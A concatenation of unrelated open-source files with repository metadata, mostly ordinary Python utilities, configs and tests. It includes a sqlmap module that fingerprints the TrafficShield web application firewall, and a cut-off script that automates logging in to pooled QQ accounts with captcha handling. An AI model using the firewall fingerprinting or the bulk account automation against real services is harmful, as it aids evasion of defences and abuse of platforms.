provider_import.subtask((provider, )).apply_async()
@task
def provider_import(provider):
'''
Run a task for one specific import
between locks
'''
if provider.is_locked:
logger.warning('Provider %s for %s is locked' % (provider.NAME, provider.user) )
return
# Lock this provider
provider.lock()
# Run the import
provider.import_user()
# Unlock this provider
provider.unlock()
|
[
"bastien.abadie@gmail.com"
] |
bastien.abadie@gmail.com
|
36ab449c480d65a79c4ea8aa488c9ea9b231d96c
|
4e7c57ffe10b144e81084a0cb406ff993338378f
|
/tests/test_vlde_return_format.py
|
8ef0bb895857389356c9a734e2a96238678e8b8f
|
[
"Apache-2.0"
] |
permissive
|
myjiejie/vlde
|
65c876d8b390033b9c5b49063f9db21dfca2b893
|
a5b20835639f0c6d42fc2fe1f42cbbe87d776bb2
|
refs/heads/master
| 2023-05-14T21:22:10.109000
| 2017-08-06T06:20:14
| 2017-08-06T06:20:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
import pytest
from vlde import Validator, ValidateError, RulesError
def test_vlde_return_format_is_object():
'''
测试返回 object 类型的验证信息
'''
v = Validator(return_format='object')
result1 = v.set_rules('string', 'str')
assert result1.status is True
result2 = v.set_rules('string', 'dict')
assert result2.status is False
def test_vlde_return_format_is_exception():
'''
test return_format is exception
'''
v = Validator(return_format='exception')
try:
hello = 'hello, world'
world = 'world, hello'
v.set_rules(hello, 'required|str')
v.set_rules(world, 'required|str')
except ValidateError as e:
print(e)
|
[
"xiaojieluoff@gmail.com"
] |
xiaojieluoff@gmail.com
|
7da4c9aaf732cf34d6211b259aa76793e428ec41
|
4f7bdeb8d601e29d391cbd08eb8d806158f17e15
|
/App_Financeiro/apps.py
|
cc3f28c42391114c1db58bd871a64f14da46599e
|
[] |
no_license
|
alexandrelalaina/Gestor
|
cca523fe3e4c5a9475aa5aca30dfa113a2e759db
|
ed072ed9065354a492079f3502acca9c8384a566
|
refs/heads/master
| 2020-04-07T13:47:59.162889
| 2018-12-10T01:14:11
| 2018-12-10T01:14:11
| 158,422,092
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
from django.apps import AppConfig
class AppFinanceiroConfig(AppConfig):
name = 'App_Financeiro'
|
[
"alexandre_lalaina@yahoo.com.br"
] |
alexandre_lalaina@yahoo.com.br
|
eba72bf58c762207a5c09daf614e1c20370299c3
|
3823561c41ad13d8e07b53ecbbc77411160a870c
|
/haunted/middleware.py
|
1e106b833c6857defeedfc145a3da5e399912c75
|
[] |
no_license
|
specialunderwear/haunted-wagtail
|
1a692b6bbd4417f7b53c3873df663698a5516aae
|
807a5c76ae04d3232577820a53ddcb03e35972b2
|
refs/heads/master
| 2021-09-09T12:58:37.154153
| 2018-03-16T10:53:46
| 2018-03-16T10:53:46
| 125,199,199
| 0
| 0
| null | 2018-03-14T12:23:37
| 2018-03-14T10:59:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,218
|
py
|
import logging
import re
import lxml.html
from django.conf import settings
logger = logging.getLogger('haunted.ghosts')
def insert_haunted_script(response):
try:
html = response.content
content = lxml.html.fromstring(html)
# styles = content.xpath('//style')
# result = toronado.from_string(html)
# result_html = result.decode('utf-8')
# root = lxml.html.fromstring(result_html)
head = content.find('.//head')
head.insert(-1, lxml.html.fromstring(
'<script type="text/javascript" src="%shaunted/main.js">' % settings.STATIC_URL
))
response.content = lxml.html.tostring(content).decode('utf-8')
return response
except Exception as e:
logger.debug(e)
return response
def haunted_middleware(get_response):
# One-time configuration and initialization.
def middleware(request):
# Code to be executed for each request before
# the view (and later middleware) are called.
response = get_response(request)
# Code to be executed for each request/response after
# the view is called.
return insert_haunted_script(response)
return middleware
|
[
"lars@permanentmarkers.nl"
] |
lars@permanentmarkers.nl
|
94087984192daa510b8192dc4e86bfd61635aec2
|
387ed452e67aa495a8c237ebed9b5bcc2d5e99c2
|
/jhu_helpers.py
|
f2a535426cf242221dd4fd75644567a108c02182
|
[
"MIT"
] |
permissive
|
felixpatzelt/covid-19
|
fdbecdbfb93e1f1d74b669141f1ca4d4db540904
|
5ef14e0bf379527258500f7edaf63f741cc5b4f7
|
refs/heads/master
| 2021-04-01T14:10:18.016201
| 2020-11-06T19:57:03
| 2020-11-06T19:57:03
| 248,192,752
| 1
| 2
|
MIT
| 2020-03-25T22:50:13
| 2020-03-18T09:50:26
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,342
|
py
|
# Helpers for loading and transforming the COVID-19 data provided the John Hopkins University
import pandas as pd
def get_jhu_data(
url_prefix = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/',
confirmed_file = 'time_series_covid19_confirmed_global.csv',
#recovered_file = 'time_series_19-covid-Recovered.csv',
deaths_file = 'time_series_covid19_deaths_global.csv'
):
"Return confirmed, recovered, deaths according to https://github.com/CSSEGISandData/COVID-19"
confirmed = pd.read_csv(url_prefix + confirmed_file)
#recovered = pd.read_csv(url_prefix + recovered_file)
deaths = pd.read_csv(url_prefix + deaths_file)
return confirmed, deaths
def aggregte_jhu_by_state(confirmed, deaths):
"Aggregate and reshape data from get_jhu to conveniently analyse cases by state"
confirmed = confirmed.drop(['Province/State','Lat','Long'], axis=1).groupby('Country/Region').sum().T
confirmed.index = pd.DatetimeIndex(confirmed.index, name='Date')
#recovered = recovered.drop(['Province/State','Lat','Long'], axis=1).groupby('Country/Region').sum().T
#recovered.index = pd.DatetimeIndex(recovered.index, name='Date')
deaths = deaths.drop(['Province/State','Lat','Long'], axis=1).groupby('Country/Region').sum().T
deaths.index = pd.DatetimeIndex(deaths.index, name='Date')
#infected = (confirmed - recovered - deaths)
# previous infection based on reports have a correlation coefficient of 0.998 with this estimate
infected = confirmed.diff().rolling('21d', min_periods=0).sum()
infection_rate = (infected / infected.shift(1))
return pd.concat({
'confirmed': confirmed, 'deaths': deaths, 'new_infected_21d': infected, 'new_infection_rate_21d': infection_rate
}, axis=1)
def get_aggregate_top_n(jhu_data, metric='confirmed', n_states=20, n_rows=5):
"Return at the most recent numbers for the states with the most cases."
return jhu_data.iloc[-n_rows:,jhu_data.iloc[-1].argsort()[:-n_states:-1]]
def join_jhu_df(confirmed, deaths):
"Return single DataFrame with JHU data and a list of columns names containing the counts for the different days"
# get into shape
non_date_cols = ['Country/Region', 'Province/State', 'Lat', 'Long']
cols = [pd.to_datetime(c).date() if c not in non_date_cols else c for c in confirmed.columns ]
days = [c for c in cols if not c in non_date_cols]
confirmed = confirmed.set_axis(cols, axis=1, inplace=False).set_index(['Country/Region','Province/State'])
#recovered = recovered.set_axis(cols, axis=1, inplace=False).set_index(['Country/Region','Province/State'])
deaths = deaths.set_axis(cols, axis=1, inplace=False).set_index(['Country/Region','Province/State'])
# calculate infected
infected = confirmed.copy()
#infected.loc[:,days] -= recovered[days] + deaths[days]
# previous infection based on reports have a correlation coefficient of 0.998 with this estimate
infected.loc[:,days] = confirmed.loc[:,days].diff(axis=1).rolling(21, min_periods=0, axis=1).sum()
# combine
return pd.concat({
'confirmed': confirmed, 'deaths': deaths, 'new_in_21_days': infected
}, axis=1), days
|
[
"noreply@github.com"
] |
felixpatzelt.noreply@github.com
|
25c0f5149b1b8478dab19786fbd606db7f34aca2
|
a3eafb9ed3a53f5dacf01a1805713080b934a4a2
|
/oregano_gui/qt/qrwindow.py
|
f6f3b5f5a4cfc3f8ac6111db7da1544d49b643a4
|
[
"MIT"
] |
permissive
|
cculianu/Oregano
|
d0b071cf5ff3d8f05a16afbf06530dab07e92e79
|
cc08f813f9cbdb80d1ac607892f8439ec064ee04
|
refs/heads/main
| 2023-04-12T19:22:10.080018
| 2021-05-02T11:42:53
| 2021-05-02T11:42:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,104
|
py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QHBoxLayout, QVBoxLayout, QWidget, QDialog, QPushButton, QSizePolicy
from oregano_gui.qt.qrcodewidget import QRCodeWidget, save_to_file, copy_to_clipboard
from .util import WWLabel, Buttons, MessageBoxMixin
from oregano.i18n import _
from oregano.util import Weak
class QR_Window(QWidget, MessageBoxMixin):
def __init__(self):
super().__init__() # Top-level window. Parent needs to hold a reference to us and clean us up appropriately.
self.setWindowTitle('Oregano - ' + _('Payment Request'))
self.label = ''
self.amount = 0
self.setFocusPolicy(Qt.NoFocus)
self.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)
main_box = QHBoxLayout(self)
main_box.setContentsMargins(12,12,12,12)
self.qrw = QRCodeWidget()
self.qrw.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)
main_box.addWidget(self.qrw, 2)
vbox = QVBoxLayout()
vbox.setContentsMargins(12,12,12,12)
main_box.addLayout(vbox,2)
main_box.addStretch(1)
self.address_label = WWLabel()
self.address_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
vbox.addWidget(self.address_label)
self.msg_label = WWLabel()
self.msg_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
vbox.addWidget(self.msg_label)
self.amount_label = WWLabel()
self.amount_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
vbox.addWidget(self.amount_label)
self.op_return_label = WWLabel()
self.op_return_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
vbox.addWidget(self.op_return_label)
vbox.addStretch(2)
copyBut = QPushButton(_("Copy QR Image"))
saveBut = QPushButton(_("Save QR Image"))
vbox.addLayout(Buttons(copyBut, saveBut))
weakSelf = Weak.ref(self) # Qt & Python GC hygeine: don't hold references to self in non-method slots as it appears Qt+Python GC don't like this too much and may leak memory in that case.
weakQ = Weak.ref(self.qrw)
weakBut = Weak.ref(copyBut)
copyBut.clicked.connect(lambda: copy_to_clipboard(weakQ(), weakBut()))
saveBut.clicked.connect(lambda: save_to_file(weakQ(), weakSelf()))
def set_content(self, win, address_text, amount, message, url, *, op_return = None, op_return_raw = None):
if op_return is not None and op_return_raw is not None:
raise ValueError('Must specify exactly one of op_return or op_return_hex as kwargs to QR_Window.set_content')
self.address_label.setText(address_text)
if amount:
amount_text = '{} {}'.format(win.format_amount(amount), win.base_unit())
else:
amount_text = ''
self.amount_label.setText(amount_text)
self.msg_label.setText(message)
self.qrw.setData(url)
if op_return:
self.op_return_label.setText(f'OP_RETURN: {str(op_return)}')
elif op_return_raw:
self.op_return_label.setText(f'OP_RETURN (raw): {str(op_return_raw)}')
self.op_return_label.setVisible(bool(op_return or op_return_raw))
self.layout().activate()
def closeEvent(self, e):
# May have modal up when closed -- because wallet window may force-close
# us when it is gets closed (See ElectrumWindow.clean_up in
# main_window.py).
# .. So kill the "QR Code Copied to clipboard" modal dialog that may
# be up as it can cause a crash for this window to be closed with it
# still up.
for c in self.findChildren(QDialog):
if c.isWindow() and c.isModal() and c.isVisible():
c.reject() # break out of local event loop for dialog as we are about to die and we will be invalidated.
super().closeEvent(e)
|
[
"karol.trzeszczkowski@gmail.com"
] |
karol.trzeszczkowski@gmail.com
|
11018d159b126cd3b9a30102bd66558aeb5831e1
|
6c2fab5a73c666d41bec2087396851f2d0547c2c
|
/threading1.py
|
fcc395d1719b33ff67f488ef243bfe9c4fcfd587
|
[] |
no_license
|
legendtkl/pypractise
|
b89717286d14882a520e3b9626f1eb6a94ddd30a
|
234b9c3f78ec76d00a1bab3fced4316131227492
|
refs/heads/master
| 2021-01-18T21:36:46.044055
| 2016-04-06T10:41:33
| 2016-04-06T10:41:33
| 41,008,614
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 557
|
py
|
import threading,time
from time import sleep,ctime
def now():
return str(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()))
def test(nloop, nsec):
print 'start loop', nloop, 'at:', now()
sleep(nsec)
print 'loop', nloop, 'done at:', now()
def main():
print 'starting at:', now()
threadpool=[]
for i in xrange(10):
th = threading.Thread(target=test, args=(i,2))
threadpool.append(th)
for th in threadpool:
th.start()
for th in threadpool:
threading.Thread.join(th)
print 'all Done at: ', now()
if __name__ == "__main__":
main()
|
[
"taokelu@gmail.com"
] |
taokelu@gmail.com
|
6c6dbcaf3913d2e2b2b9fc3c5de707c3b2a3ccde
|
96fe7cb1495928a9699ade24200b445755e47f3b
|
/src/structurizr/api/structurizr_client_settings.py
|
c8752c888dfdcca0a4140292f2c169cca1c36d8a
|
[
"Apache-2.0"
] |
permissive
|
Midnighter/structurizr-python
|
ab4a9f71c01d1febde5c6e61a3a961953f1ef440
|
31f1dcadb3ff113d8a77ce132657237ea01c307b
|
refs/heads/devel
| 2023-02-08T19:43:22.344155
| 2023-01-21T10:12:49
| 2023-01-21T10:12:49
| 144,895,441
| 61
| 16
|
Apache-2.0
| 2023-01-21T09:53:35
| 2018-08-15T19:35:01
|
Python
|
UTF-8
|
Python
| false
| false
| 3,435
|
py
|
# Copyright (c) 2020, Moritz E. Beber.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provide the Structurizr client settings."""
import logging
from getpass import getuser
from pathlib import Path
from socket import getfqdn
from typing import Optional
try:
from importlib.metadata import version
except ModuleNotFoundError:
from importlib_metadata import version
from pydantic import UUID4, BaseSettings, DirectoryPath, Field, HttpUrl
__all__ = ("StructurizrClientSettings",)
logger = logging.getLogger(__name__)
try:
USER = getuser()
except ModuleNotFoundError:
logger.error(
"Could not determine the username. Please set it manually or provide a "
"STRUCTURIZR_USER environment variable."
)
USER = "anonymous"
hostname = getfqdn()
if hostname:
USER = f"{USER}@{hostname}"
AGENT = f"structurizr-python/{version('structurizr-python')}"
class StructurizrClientSettings(BaseSettings):
"""
Define the Structurizr client settings.
Attributes:
url (str): The Structurizr API URL.
workspace_id (int): The Structurizr workspace identifier.
api_key (str): The Structurizr workspace API key.
api_secret (str): The Structurizr workspace API secret.
user (str): A string identifying the user (e.g. an e-mail address or username).
agent (str): A string identifying the agent (e.g. 'structurizr-java/1.2.0').
workspace_archive_location (pathlib.Path): A directory for archiving downloaded
workspaces.
"""
url: HttpUrl = Field(
default="https://api.structurizr.com",
env="STRUCTURIZR_URL",
description="The Structurizr API URL.",
)
workspace_id: int = Field(
...,
env="STRUCTURIZR_WORKSPACE_ID",
description="The Structurizr workspace identifier.",
)
api_key: UUID4 = Field(
...,
env="STRUCTURIZR_API_KEY",
description="The Structurizr workspace API key.",
)
api_secret: UUID4 = Field(
...,
env="STRUCTURIZR_API_SECRET",
description="The Structurizr workspace API secret.",
)
user: str = Field(
default=USER,
env="STRUCTURIZR_USER",
description="A string identifying the user (e.g. an e-mail address or "
"username).",
)
agent: str = Field(
default=AGENT,
env="STRUCTURIZR_AGENT",
description="A string identifying the agent (e.g. 'structurizr-java/1.2.0').",
)
workspace_archive_location: Optional[DirectoryPath] = Field(
default=Path.cwd(),
env="STRUCTURIZR_WORKSPACE_ARCHIVE_LOCATION",
description="A directory for archiving downloaded workspaces, or None to "
"suppress archiving.",
)
class Config:
"""Configure the Structurizr client settings."""
case_sensitive = True
env_prefix = "STRUCTURIZR_"
env_file = ".env"
|
[
"midnighter@posteo.net"
] |
midnighter@posteo.net
|
191346bd7866002cf2567ce2f66b37874aa9dafc
|
c5789b6576ac914ce7269834b6a288ad8fe418a0
|
/Utilities/native_event_handler.py
|
567ecc5b3fb266a59e6c283f91e75acc9a78d53b
|
[
"Apache-2.0"
] |
permissive
|
utkarsh7236/SCILLA
|
3ebdd2cef7dc65061e4ae334a0c6b50efc052aa7
|
e11e4d753823ad522a1b3168283b6e6ffe3ea393
|
refs/heads/master
| 2022-08-03T18:06:01.905309
| 2020-05-27T08:29:07
| 2020-05-27T08:29:07
| 264,383,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,093
|
py
|
#!/usr/bin/env python
#==============================================================
import os
import time
import uuid
import fnmatch
from Utilities.decorators import thread, process
#==============================================================
class FileEventHandler(object):
def __init__(self, action, pattern):
self.pattern = pattern
self.action = action
self.stopped = True
self.ident = str(uuid.uuid4())[:8]
@thread
def execute(self, found_file):
self.action(found_file)
@thread
def stream(self, path):
executed_matches = []
self.run = True
self.stopped = False
while True:
matches = []
for root, dir_name, file_names in os.walk(path):
for file_name in fnmatch.filter(file_names, self.pattern):
matches.append(os.path.join(root, file_name))
for match in matches:
if match in executed_matches: continue
time.sleep(0.005)
executed_matches.append(match)
self.execute(match)
if not self.run: break
self.stopped = True
def stop(self):
self.run = False
while not self.stopped:
time.sleep(0.05)
|
[
"utkarsh7236@gmail.com"
] |
utkarsh7236@gmail.com
|
47e1d7e513554163a8a70acdbfa11df610694f3d
|
cea490c99880c5121c20afdb148340a706b4b5c6
|
/src/web-interface/capturepic.py
|
8243e782722e09aaa8b3de28bb9220e63f52da33
|
[] |
no_license
|
sgichohi/sauron
|
1bb3be91b94a7c3e124bbed8af83996f1ee2dbf5
|
da0ae915e1cf92195d4f3e5be425877e09a7c138
|
refs/heads/master
| 2021-07-14T11:23:53.437430
| 2019-11-05T20:38:31
| 2019-11-05T20:38:31
| 14,182,504
| 0
| 0
| null | 2021-03-19T22:17:06
| 2013-11-06T19:07:06
|
C++
|
UTF-8
|
Python
| false
| false
| 1,230
|
py
|
from utils import ensure_dir
import cv2
from models import CameraFrame
from cameraClient import CameraClient
import os
import settings
def saveImage(conn, parent_dir, session):
ensure_dir(parent_dir)
count = 0L
while True:
path = conn.recv()
fileLocation = path
#print "filelocation", fileLocation
#fileLocation = os.path.relpath(path, settings.STATIC_DIR["path"])
fr = CameraFrame(location=fileLocation, lamport_time=count)
session.add(fr)
if count % 10 == 0:
session.commit()
count += 1
session.commit()
conn.close()
def grabFrame(conn, port):
cam = CameraClient('127.0.0.1', int(port))
while True:
#im = cam.getDir()
for im in cam.getDir():
conn.send(im)
def ngrabFrame(conn, port):
"""Grabs a frame from the network"""
cap = cv2.VideoCapture(0)
while(cap.isOpened()):
ret, frame = cap.read()
if ret==True:
conn.send(frame)
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
conn.close()
cv2.destroyAllWindows()
|
[
"samuel.kiiru@gmail.com"
] |
samuel.kiiru@gmail.com
|
1c019cbb6eb7a1ea56e120459e6de533ca6d8b6c
|
0fa113c0b5fdacfa3345672a26875ce2699bc81c
|
/auctions/migrations/0016_alter_whatchlist_auction_list.py
|
560897115378dd327a0ca26324875fe96671eee4
|
[] |
no_license
|
Fideran/commerce
|
5750fa8c259fba536f06f89a0ff731fc9a95600b
|
f6a65077d2b76c450750d470e654cf61ba16aeae
|
refs/heads/master
| 2023-08-21T15:54:25.070441
| 2021-10-15T15:42:19
| 2021-10-15T15:42:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
# Generated by Django 3.2.6 on 2021-09-08 17:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('auctions', '0015_alter_whatchlist_user'),
]
operations = [
migrations.AlterField(
model_name='whatchlist',
name='auction_list',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='auction_lists', to='auctions.auction'),
),
]
|
[
"fenofiderana5@gmail.com"
] |
fenofiderana5@gmail.com
|
61dace6b37d778c0d4a8d5a63ac59129c3ca283b
|
7be0540640d6bbbccebf2c956f424527dd77cd55
|
/pytest.py
|
26db34d2dafc05d3004aceb579e36fc632884917
|
[] |
no_license
|
ToonyawatA/Example
|
278bb2f2a07294fa5c3e79a5845254bfa28a678d
|
9fdd462c4f1e62de9d38bdc4d2930ab4dab5f832
|
refs/heads/master
| 2023-03-21T11:29:23.825314
| 2021-03-08T23:59:13
| 2021-03-08T23:59:13
| 343,769,540
| 0
| 0
| null | 2021-03-04T00:25:57
| 2021-03-02T12:37:58
|
Julia
|
UTF-8
|
Python
| false
| false
| 62
|
py
|
def abc(x, y):
return x+y
def qwe(x, y):
return x*y
|
[
"physicstj301136"
] |
physicstj301136
|
77f6db07aa43c88970d7844bffed3e7999b5340a
|
953c2cdd9a554b90392dc8754546eb914dd68ee9
|
/project/asgi.py
|
32bd127d5fbf2bd343b2dd813743871df16b6014
|
[
"MIT"
] |
permissive
|
kajala/django-jutil
|
68d24b99f706b53f9a183978fcd6e7541e7ac8de
|
b32aeaeeee8cbcb37a8cf241bd7271e7c9e669d5
|
refs/heads/develop
| 2023-09-02T10:07:53.334084
| 2023-08-28T14:23:45
| 2023-08-28T14:23:45
| 121,220,767
| 7
| 2
|
MIT
| 2023-07-02T16:43:50
| 2018-02-12T08:35:25
|
Python
|
UTF-8
|
Python
| false
| false
| 407
|
py
|
"""
ASGI config for project project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application # type: ignore
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'project.settings')
application = get_asgi_application()
|
[
"kajala@gmail.com"
] |
kajala@gmail.com
|
9b44c3a37622560b29530ed836ed10361b1c5473
|
c5758c1f4c880f4530df1a5ffb4c30ee2da445ee
|
/pytracking/tracker/segm_sk_max/__init__.py
|
a20006a5c97b46f827888b1d0108506ee38ff2b3
|
[] |
no_license
|
bfjei2825401/d3s
|
6d662fc301181a0e3ad831b0db6111e3cf8f4097
|
32140a3c67252f0e98cbfbf6ad6d2a79267c221b
|
refs/heads/master
| 2023-02-27T09:57:25.692878
| 2021-01-27T14:20:57
| 2021-01-27T14:20:57
| 297,217,521
| 0
| 0
| null | 2020-09-21T03:23:09
| 2020-09-21T03:23:09
| null |
UTF-8
|
Python
| false
| false
| 83
|
py
|
from .segm_sk_max import SegmSKMax
def get_tracker_class():
return SegmSKMax
|
[
"752958525@qq.com"
] |
752958525@qq.com
|
3704fbcb4f01956c37fe375541cac714ce70e6ec
|
06cf972369c30da9d98b296bcbc26a826aa98126
|
/aloisioimoveis/locations/apps.py
|
a01c82bdc98cf361b23558596a1fe65896a0c146
|
[] |
no_license
|
thiagorossener/aloisioimoveis
|
2597422af6ac058ed3b8aa6e58f0f8913488a7fe
|
f9d974440f9a8cc875da8a1d4a5c885429563c1b
|
refs/heads/master
| 2021-06-16T23:02:11.193518
| 2021-02-01T14:17:10
| 2021-02-01T14:17:10
| 94,144,023
| 18
| 17
| null | 2021-06-10T20:35:48
| 2017-06-12T21:55:18
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 156
|
py
|
from django.apps import AppConfig
class LocationsConfig(AppConfig):
name = 'aloisioimoveis.locations'
verbose_name = 'Controle de Localizações'
|
[
"thiago.rossener@gmail.com"
] |
thiago.rossener@gmail.com
|
ae9dabdb231bafe65155539cc2eb4064a18766ef
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02391/s357788596.py
|
98d6068bc7580b5bf0215d2b95c7e9d07ff5810d
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 141
|
py
|
v=raw_input()
a=int(v[:v.find(" ")])
b=int(v[v.find(" "):])
if(a>b):
print "a > b"
elif(a<b):
print "a < b"
else:
print "a == b"
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
4fb2c6fdfd1cff89412f02edfe39d142b07f782d
|
9bdc01fddc660053e23eaf89302f9b8e5daaefdf
|
/scripts/urdf_create/urdf_create_Lshape.py
|
22aabaa0a96e6fc830fee1f784b3af2cdc631108
|
[] |
no_license
|
hello-starry/MotionExplorer
|
51d4ca1a1325567968ac2119de7c96b0345e5b10
|
01472004a1bc1272ce32a433fe6bde81eb962775
|
refs/heads/master
| 2023-08-14T21:20:22.073477
| 2021-09-07T17:51:20
| 2021-09-07T17:51:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,105
|
py
|
import os
import numpy as np
from math import cos,sin,pi,atan2
from urdf_create import *
from urdf_create_primitives import *
L1 = 1.7
L2 = 1.2
thicknessx = 0.2
thicknessy = 1.5
robot_name = 'Lshape/Lshape'
fname = getPathname(robot_name)
f = open(fname,'w')
f.write('<?xml version="1.0"?>\n')
f.write('<robot name="'+robot_name+'">\n')
hstr = createCuboid("link1",0,0,0,L1,thicknessy,thicknessx)
#hstr += createCuboid("link2",-L1/2,0,thickness/2+L2/2,thickness,thickness,L2)
hstr += createCuboid("link2",-L1/2+thicknessx/2,0,L2/2+thicknessx/2,thicknessx,thicknessy,L2)
hstr += createRigidJoint( "link1", "link2")
f.write(hstr)
f.write(' <klampt package_root="../../.." default_acc_max="4" >\n')
f.write(' </klampt>\n')
f.write('</robot>')
f.close()
print "\nCreated new file >>",fname
### create nested robots
CreateSphereRobot(robot_name + "_sphere_inner", thicknessx/2)
d = np.sqrt((L1/2)**2+L2**2)
CreateSphereRobot(robot_name + "_sphere_outer", d)
CreateCylinderRobot(robot_name + "_capsule_inner", thicknessx/2, L1)
CreateCylinderRobot(robot_name + "_capsule_outer", L2+thicknessx/2, L1)
|
[
"andreas.orthey@gmx.de"
] |
andreas.orthey@gmx.de
|
fe8f88f236d3472237c2ee9d9b15bb78a60de4ab
|
31476faeaeac0f7ca2821235899b126736f04887
|
/waf/trafficshield.py
|
b167f11e932c4017b9bfa57291b03b98ed1b8f79
|
[] |
no_license
|
h3r1C0d3/sqlmap
|
4489335963097b62e40b6a4d9197577744a60295
|
bdf72b0ffa309d56d697b3fd91ac0388208b9445
|
refs/heads/master
| 2021-01-21T00:30:16.796660
| 2013-02-22T16:34:53
| 2013-02-22T16:34:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 466
|
py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import HTTPHEADER
__product__ = "TrafficShield (F5 Networks)"
def detect(get_page):
page, headers, code = get_page()
return (re.search(r"\AASINFO=", headers.get(HTTPHEADER.COOKIE, ""), re.I) or re.search(r"F5-TrafficShield", headers.get(HTTPHEADER.SERVER, ""), re.I)) is not None
|
[
"miroslav.stampar@gmail.com"
] |
miroslav.stampar@gmail.com
|
050189f07fd0a95927415aec2867f1ab52b53362
|
a32c2ee4e6b2b1c6f8db02320c4bd50b17940af5
|
/modules/EIMCutQQ/EIMCutQQ.py
|
d1c8bc0e4432ff9e7a5e04f070bb97c7fad19d9a
|
[] |
no_license
|
wszg5/studyGit
|
93d670884d4cba7445c4df3a5def8085e5bf9ac0
|
bebfc90bc38689990c2ddf52e5a2f7a02649ea00
|
refs/heads/master
| 2020-04-05T02:55:17.367722
| 2018-11-07T06:01:03
| 2018-11-07T06:01:03
| 156,494,390
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,726
|
py
|
# coding:utf-8
import threading
import time
from PIL import Image
from uiautomator import Device
from imageCode import imageCode
from Repo import *
import datetime, random
from zservice import ZDevice
from slot import slot
import os
class EIMCutQQ:
def __init__(self):
self.type = 'eim'
self.repo = Repo()
self.slot = slot(self.type)
def GetUnique(self):
nowTime = datetime.datetime.now().strftime("%Y%m%d%H%M%S"); # 生成当前时间
randomNum = random.randint(0, 1000); # 生成的随机整数n,其中0<=n<=100
if randomNum <= 10:
randomNum = str(00) + str(randomNum);
uniqueNum = str(nowTime) + str(randomNum);
return uniqueNum
def login(self,d,args,z):
z.heartbeat()
base_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, "tmp"))
if not os.path.isdir(base_dir):
os.mkdir(base_dir)
sourcePng = os.path.join(base_dir, "%s_s.png" % (self.GetUnique()))
codePng = os.path.join(base_dir, "%s_c.png" % (self.GetUnique()))
z.sleep(1)
t = 1
while t == 1: #直到登陆成功为止
time_limit1 = args['time_limit1']
cate_id = args["repo_cate_id"]
numbers = self.repo.GetAccount(cate_id, time_limit1, 1)
while len(numbers) == 0:
d.server.adb.cmd("shell", "am broadcast -a com.zunyun.zime.toast --es msg \"EIM%s号帐号库为空,等待中\"" % cate_id).communicate()
